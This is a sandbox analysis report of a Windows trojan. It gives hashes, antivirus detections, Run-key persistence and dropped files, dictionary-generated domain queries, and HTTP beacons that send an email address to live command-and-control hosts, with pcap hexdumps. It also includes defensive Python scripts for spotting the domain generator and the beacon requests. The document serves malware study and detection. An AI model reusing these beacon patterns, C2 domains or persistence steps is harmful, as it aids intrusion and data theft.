Analysis Date: 2015-07-27 18:47:20
MD5: 8de98ec43744dfdcbbd440be037bb9ad
SHA1: f516c7e82ed5b5b2c16fca8aaea750c1ca014407

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: d362b3b6f821e7c63430cbf68814b648 sha1: a9732c69e049618956cc1e737a29ed6ae2d4566e size: 301056
Section .rdata md5: dd09ae87b075a426e4f337515b9a1485 sha1: ff587f35fc80e0b3358571711b251459c8be680c size: 34816
Section .data md5: 6dc8997cc8bfa739631ab683259089b4 sha1: b313c651bd6d161dcffbe666f04abc743006e6f0 size: 100864
Timestamp: 2014-10-30 10:11:53
Packer: Microsoft Visual C++ ?.?
PEhash: 13c7c58493b946492c56c54eb7e9644087237eaa
IMPhash: 5d3e7ec6260c2b1d2178c30617dfff5a
AV Rising: 0x57c13024
AV Mcafee: Trojan-FEMT!8DE98EC43744
AV Avira (antivir): TR/ATRAPS.Gen2
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Eset (nod32): Win32/Agent.VNC
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Agent.VNC!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: no_virus
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Agent.gen
AV Authentium: W32/Wonton.B2.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TSPY_NIVDORT.SMB
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader15.3578
AV F-Secure: Gen:Variant.Symmi.22722
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AutoConnect Thread Trap Compatibility ➝ C:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\nddvvoo\cefhxxmuwrv.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.hn
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe"

Network Details:

DNS sweetsmell.net (A): 176.34.234.43
DNS sweetsmell.net (A): 46.137.81.225
DNS sweetsmell.net (A): 54.75.225.111
DNS sweetsmell.net (A): 54.246.118.68
DNS sweetsmell.net (A): 54.246.123.138
DNS sweetsmell.net (A): 79.125.109.53
DNS simplehealth.net (A): 98.124.198.1
DNS possibleseparate.net (A): 208.91.197.241
DNS mountainhealth.net (A): 69.64.147.249
DNS winterclothes.net (A): 66.151.181.49
DNS leaveseparate.net (A): 95.211.230.75
DNS sweethealth.net (A): 50.63.202.3
DNS wintersafety.net (A): no answer recorded
DNS subjectsafety.net (A): no answer recorded
DNS winterfuture.net (A): no answer recorded
DNS subjectfuture.net (A): no answer recorded
DNS finishsmell.net (A): no answer recorded
DNS leavesmell.net (A): no answer recorded
DNS finishearly.net (A): no answer recorded
DNS leaveearly.net (A): no answer recorded
DNS finishsafety.net (A): no answer recorded
DNS leavesafety.net (A): no answer recorded
DNS finishfuture.net (A): no answer recorded
DNS leavefuture.net (A): no answer recorded
DNS probablysmell.net (A): no answer recorded
DNS sweetearly.net (A): no answer recorded
DNS probablyearly.net (A): no answer recorded
DNS sweetsafety.net (A): no answer recorded
DNS probablysafety.net (A): no answer recorded
DNS sweetfuture.net (A): no answer recorded
DNS probablyfuture.net (A): no answer recorded
DNS severalsmell.net (A): no answer recorded
DNS materialsmell.net (A): no answer recorded
DNS severalearly.net (A): no answer recorded
DNS materialearly.net (A): no answer recorded
DNS severalsafety.net (A): no answer recorded
DNS materialsafety.net (A): no answer recorded
DNS severalfuture.net (A): no answer recorded
DNS materialfuture.net (A): no answer recorded
DNS severaseparate.net (A): no answer recorded
DNS laughseparate.net (A): no answer recorded
DNS severahealth.net (A): no answer recorded
DNS laughhealth.net (A): no answer recorded
DNS severaclothes.net (A): no answer recorded
DNS laughclothes.net (A): no answer recorded
DNS severadistant.net (A): no answer recorded
DNS laughdistant.net (A): no answer recorded
DNS simpleseparate.net (A): no answer recorded
DNS motherseparate.net (A): no answer recorded
DNS motherhealth.net (A): no answer recorded
DNS simpleclothes.net (A): no answer recorded
DNS motherclothes.net (A): no answer recorded
DNS simpledistant.net (A): no answer recorded
DNS motherdistant.net (A): no answer recorded
DNS mountainseparate.net (A): no answer recorded
DNS possiblehealth.net (A): no answer recorded
DNS mountainclothes.net (A): no answer recorded
DNS possibleclothes.net (A): no answer recorded
DNS mountaindistant.net (A): no answer recorded
DNS possibledistant.net (A): no answer recorded
DNS perhapsseparate.net (A): no answer recorded
DNS windowseparate.net (A): no answer recorded
DNS perhapshealth.net (A): no answer recorded
DNS windowhealth.net (A): no answer recorded
DNS perhapsclothes.net (A): no answer recorded
DNS windowclothes.net (A): no answer recorded
DNS perhapsdistant.net (A): no answer recorded
DNS windowdistant.net (A): no answer recorded
DNS winterseparate.net (A): no answer recorded
DNS subjectseparate.net (A): no answer recorded
DNS winterhealth.net (A): no answer recorded
DNS subjecthealth.net (A): no answer recorded
DNS subjectclothes.net (A): no answer recorded
DNS winterdistant.net (A): no answer recorded
DNS subjectdistant.net (A): no answer recorded
DNS finishseparate.net (A): no answer recorded
DNS finishhealth.net (A): no answer recorded
DNS leavehealth.net (A): no answer recorded
DNS finishclothes.net (A): no answer recorded
DNS leaveclothes.net (A): no answer recorded
DNS finishdistant.net (A): no answer recorded
DNS leavedistant.net (A): no answer recorded
DNS sweetseparate.net (A): no answer recorded
DNS probablyseparate.net (A): no answer recorded
DNS probablyhealth.net (A): no answer recorded
DNS sweetclothes.net (A): no answer recorded
DNS probablyclothes.net (A): no answer recorded
DNS sweetdistant.net (A): no answer recorded
DNS probablydistant.net (A): no answer recorded
DNS severalseparate.net (A): no answer recorded
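The query list above is what a defender should take from this report: dozens of .net names built from a small pool of English words, almost all of them unanswered, and a handful that resolve. The script below is an added example, not part of the report or of any vendor's tooling. It parses the DNS section in the three-line layout the sandbox uses, factors each name against two word lists inferred by eye from the full list above (an assumption about the generator, not something the report states), and reports the live names together with a verdict. The embedded sample is a subset of the entries above.

```python
"""
Dictionary-DGA triage over the DNS section of a sandbox report.

Added example, not part of the report or of any vendor tooling. The sample is
a subset of the report's DNS entries in their original three-line layout; the
two word lists are inferred by eye from the full list of names and are an
assumption about the generator, not something the report states.
"""
import re
from collections import defaultdict

# Subset of the report's DNS section (resolved names carry an answer line).
SAMPLE_DNS_SECTION = (
    "DNSsweetsmell.net\nType: A\n176.34.234.43\n"
    "DNSsweetsmell.net\nType: A\n46.137.81.225\n"
    "DNSsimplehealth.net\nType: A\n98.124.198.1\n"
    "DNSpossibleseparate.net\nType: A\n208.91.197.241\n"
    "DNSmountainhealth.net\nType: A\n69.64.147.249\n"
    "DNSwinterclothes.net\nType: A\n66.151.181.49\n"
    "DNSleaveseparate.net\nType: A\n95.211.230.75\n"
    "DNSsweethealth.net\nType: A\n50.63.202.3\n"
    "DNSwintersafety.net\nType: A\nDNSsubjectsafety.net\nType: A\n"
    "DNSwinterfuture.net\nType: A\nDNSfinishsmell.net\nType: A\n"
    "DNSleaveearly.net\nType: A\nDNSprobablyfuture.net\nType: A\n"
    "DNSseveralsmell.net\nType: A\nDNSmaterialearly.net\nType: A\n"
    "DNSseveraseparate.net\nType: A\nDNSlaughdistant.net\nType: A\n"
    "DNSmotherhealth.net\nType: A\nDNSperhapsclothes.net\nType: A\n"
    "DNSwindowdistant.net\nType: A\n"
)

# Inferred vocabulary (assumption): every generated label is first + second.
FIRST_WORDS = {"sweet", "simple", "possible", "mountain", "winter", "leave",
               "subject", "finish", "probably", "several", "material", "severa",
               "laugh", "mother", "perhaps", "window"}
SECOND_WORDS = {"smell", "health", "separate", "clothes", "safety", "future",
                "early", "distant"}

IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def parse_dns_section(text):
    """Map each queried name to the A answers logged for it (empty if none).

    Names with no answer are the signal a DGA hunter wants: most generated
    names are never registered, and the few that resolve are the live C2.
    """
    answers = defaultdict(list)
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("DNS"):
            current = line[len("DNS"):]
            answers.setdefault(current, [])
        elif current and IPV4.fullmatch(line):
            answers[current].append(line)
    return dict(answers)


def factor_label(label, first=FIRST_WORDS, second=SECOND_WORDS):
    """Split a second-level label into (first, second) words, or None."""
    for w1 in first:
        rest = label[len(w1):]
        if label.startswith(w1) and rest in second:
            return w1, rest
    return None


def triage(answers, tld=".net"):
    """Summarise a query set the way an analyst does when hunting a DGA."""
    factored, unfactored, resolved = {}, [], {}
    for domain, ips in answers.items():
        if ips:
            resolved[domain] = ips
        parts = factor_label(domain[:-len(tld)]) if domain.endswith(tld) else None
        if parts is None:
            unfactored.append(domain)
        else:
            factored[domain] = parts
    firsts = {w for w, _ in factored.values()}
    seconds = {w for _, w in factored.values()}
    queried = len(answers)
    unresolved_share = (queried - len(resolved)) / queried if queried else 0.0
    # Thresholds are a judgement call: enough names, nearly all of them built
    # from the vocabulary, and most of them unanswered.
    verdict = (len(factored) >= 10
               and len(factored) / queried >= 0.9
               and unresolved_share >= 0.5)
    return {
        "queried": queried,
        "dictionary_hits": len(factored),
        "unfactored": sorted(unfactored),
        "resolved": resolved,  # the names to block or sinkhole first
        "vocab": (len(firsts), len(seconds)),
        "grid_coverage": len(factored) / max(1, len(firsts) * len(seconds)),
        "is_dictionary_dga": verdict,
    }


if __name__ == "__main__":
    for key, value in triage(parse_dns_section(SAMPLE_DNS_SECTION)).items():
        print(f"{key}: {value}")
```

On the embedded subset the vocabulary comes out as 16 first words by 8 second words, a grid of 128 names of which the sample walks 20; the full list in the report covers 90 of them. The resolved set is the actionable part: those seven names (and the addresses behind them) are what the sample actually talked to, which is also what the TCP flows further down confirm.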
HTTP GET: http://sweetsmell.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent: (none)
HTTP GET: http://simplehealth.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent: (none)
HTTP GET: http://possibleseparate.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent: (none)
HTTP GET: http://mountainhealth.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent: (none)
HTTP GET: http://winterclothes.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent: (none)
HTTP GET: http://leaveseparate.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent: (none)
HTTP GET: http://sweethealth.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent: (none)
Flows TCP: 192.168.1.1:1031 ➝ 176.34.234.43:80
Flows TCP: 192.168.1.1:1032 ➝ 98.124.198.1:80
Flows TCP: 192.168.1.1:1033 ➝ 208.91.197.241:80
Flows TCP: 192.168.1.1:1034 ➝ 69.64.147.249:80
Flows TCP: 192.168.1.1:1035 ➝ 66.151.181.49:80
Flows TCP: 192.168.1.1:1036 ➝ 95.211.230.75:80
Flows TCP: 192.168.1.1:1037 ➝ 50.63.202.3:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207377    close..Host: sw
0x00000070 (00112)   65657473 6d656c6c 2e6e6574 0d0a0d0a   eetsmell.net....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207369    close..Host: si
0x00000070 (00112)   6d706c65 6865616c 74682e6e 65740d0a   mplehealth.net..
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a20706f    close..Host: po
0x00000070 (00112)   73736962 6c657365 70617261 74652e6e   ssibleseparate.n
0x00000080 (00128)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206d6f    close..Host: mo
0x00000070 (00112)   756e7461 696e6865 616c7468 2e6e6574   untainhealth.net
0x00000080 (00128)   0d0a0d0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207769    close..Host: wi
0x00000070 (00112)   6e746572 636c6f74 6865732e 6e65740d   nterclothes.net.
0x00000080 (00128)   0a0d0a0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206c65    close..Host: le
0x00000070 (00112)   61766573 65706172 6174652e 6e65740d   aveseparate.net.
0x00000080 (00128)   0a0d0a0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207377    close..Host: sw
0x00000070 (00112)   65657468 65616c74 682e6e65 740d0a0d   eethealth.net...
0x00000080 (00128)   0a0d0a0a 0d0a                         ......
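The hexdumps above are the report's record of each request, and all seven have the same shape: GET /index.php with an email= value, method=post and a bare len key in the query, HTTP/1.0, Connection: close, a Host header, and no User-Agent at all. The script below is an added example, not part of the report. It decodes the sandbox's hexdump layout back to bytes (checking the per-line offsets so a block mangled during extraction is rejected rather than mis-assembled), parses the request, and scores it against those traits. The two hexdump blocks are copied from the report (the second one carries the stray bytes logged after the headers); the benign request is constructed as a control.

```python
"""
Rebuild HTTP requests from the report's raw pcap hexdumps and test each one
against the beacon shape the seven requests share.

Added example, not part of the report. The two hexdump blocks are copied from
the report; the benign request is constructed as a control; the trait list is
what an analyst reads off the report's requests.
"""
import re
from urllib.parse import parse_qsl, urlsplit

SWEETSMELL_DUMP = """\
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept:
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207377    close..Host: sw
0x00000070 (00112)   65657473 6d656c6c 2e6e6574 0d0a0d0a   eetsmell.net....
0x00000080 (00128)
"""

MOUNTAINHEALTH_DUMP = """\
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept:
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206d6f    close..Host: mo
0x00000070 (00112)   756e7461 696e6865 616c7468 2e6e6574   untainhealth.net
0x00000080 (00128)   0d0a0d0a 0d0a                         ......
"""

# Constructed control case: an ordinary browser-style request to the same path.
BENIGN_REQUEST = (b"GET /index.php?page=1 HTTP/1.1\r\nHost: www.example.com\r\n"
                  b"User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n")

# "0x<hex offset> (<decimal offset>)   <35-char hex column>   <ascii column>"
DUMP_LINE = re.compile(r"^0x([0-9a-fA-F]{8}) \((\d+)\)\s*(.{0,35})")


def decode_hexdump(dump):
    """Return the bytes a hexdump block shows, trusting only the hex column.

    Each line's decimal offset must equal the bytes decoded so far, so a block
    that lost or reordered a line is rejected rather than mis-assembled.
    """
    buf = bytearray()
    for line in dump.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            continue
        if int(m.group(2)) != len(buf):
            raise ValueError(f"non-contiguous hexdump at offset {m.group(2)}")
        buf += bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", m.group(3)))
    return bytes(buf)


def parse_http_request(raw):
    """Split a raw request into request line, headers and any bytes after them."""
    head, _, trailing = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "trailing": trailing}


def beacon_traits(req):
    """Each trait the report's seven requests share, evaluated on one request."""
    url = urlsplit(req["target"])
    query = dict(parse_qsl(url.query, keep_blank_values=True))
    h = req["headers"]
    return {
        "get_index_php": req["method"] == "GET" and url.path == "/index.php",
        "email_in_query": "@" in query.get("email", ""),
        "method_post_in_query": query.get("method") == "post",
        "bare_len_key": query.get("len") == "",      # "&len" with no value
        "http_1_0": req["version"] == "HTTP/1.0",
        "connection_close": h.get("connection", "").lower() == "close",
        "no_user_agent": "user-agent" not in h,      # the report shows none
    }


def analyse(raw):
    """Verdict plus the indicators worth pivoting on (reported e-mail, C2 host)."""
    req = parse_http_request(raw)
    traits = beacon_traits(req)
    query = dict(parse_qsl(urlsplit(req["target"]).query, keep_blank_values=True))
    return {"is_beacon": all(traits.values()), "traits": traits,
            "host": req["headers"].get("host"), "email": query.get("email"),
            "trailing_bytes": len(req["trailing"])}


if __name__ == "__main__":
    for name, raw in (("sweetsmell", decode_hexdump(SWEETSMELL_DUMP)),
                      ("mountainhealth", decode_hexdump(MOUNTAINHEALTH_DUMP)),
                      ("benign", BENIGN_REQUEST)):
        print(name, analyse(raw))
```

The same traits are what a proxy or IDS search would key on: a GET to /index.php whose query carries method=post and a bare len, sent as HTTP/1.0 without a User-Agent. The email= value is the address the sample reports to its controllers, so it is the one string to search for across web proxy logs when looking for other hosts running the same build.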


Strings